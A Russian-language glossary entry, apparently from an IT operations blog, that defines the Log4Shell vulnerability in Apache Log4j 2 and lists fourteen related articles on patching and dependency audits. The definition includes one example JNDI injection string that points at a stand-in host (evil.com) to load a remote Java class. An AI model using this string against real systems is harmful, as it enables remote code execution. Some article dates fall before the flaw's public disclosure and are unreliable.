Log4Shell
Также: CVE-2021-44228, Log4j RCE, JNDI injection, Log4j уязвимость
Log4Shell - критическая уязвимость удалённого выполнения кода в библиотеке Apache Log4j 2, обнаруженная в декабре 2021 года. Атакующий передаёт в любое залогированное поле строку вида ${jndi:ldap://evil.com/x} - Log4j обрабатывает её как шаблон, инициирует LDAP-запрос и загружает произвольный Java-класс с внешнего сервера. Log4j применялась повсеместно, поэтому под удар попали миллионы сервисов - от игровых серверов до корпоративных систем.
Статьи с этим термином · 14
- SBOM и импортозамещение: аудит зависимостей с Syft и Grype на отечественных дистрибутивах · 27 сентября 2022
- GitHub Actions и утечка токенов: аудит CI/CD цепочки поставки · 12 апреля 2022
- Spring4Shell: патч вышел, разворачиваем обновления по клиентам · 1 апреля 2022
- Spring4Shell (CVE-2022-22965): снова Java, снова критическая RCE · 1 апреля 2022
- CVE-2022-21907: червеобразная уязвимость HTTP.sys и экстренный патчинг Windows Server 2019 · 28 января 2022
- Patch Tuesday январь 2022: CVE-2022-21857 в Active Directory и приоритизация патчей без простоя · 21 января 2022
- Log4Shell: завершаем январский аудит и считаем хвосты · 7 января 2022
- Планы на H1 2022: SBOM для всех, КИИ по 239-му, пилоты отечественных ОС и Zero Trust в операционном режиме · 29 декабря 2021
- Итоги 2021: Log4Shell перестроил приоритеты, Rocky созрел, WS2022 требует нового железа · 27 декабря 2021
- Log4Shell playbook: три волны за неделю и восемь клиентов параллельно · 20 декабря 2021
- Log4j 2.17.0 и SBOM: три дня против двух часов · 17 декабря 2021
- SBOM в каждый пайплайн: Syft + Grype после Log4Shell в проде клиентов · 15 декабря 2021
- Log4Shell: WAF-сигнатуры обходятся обфускацией - переходим к системному отключению JNDI · 8 декабря 2021
- Log4Shell: первые 12 часов с инвентарём на руках · 1 декабря 2021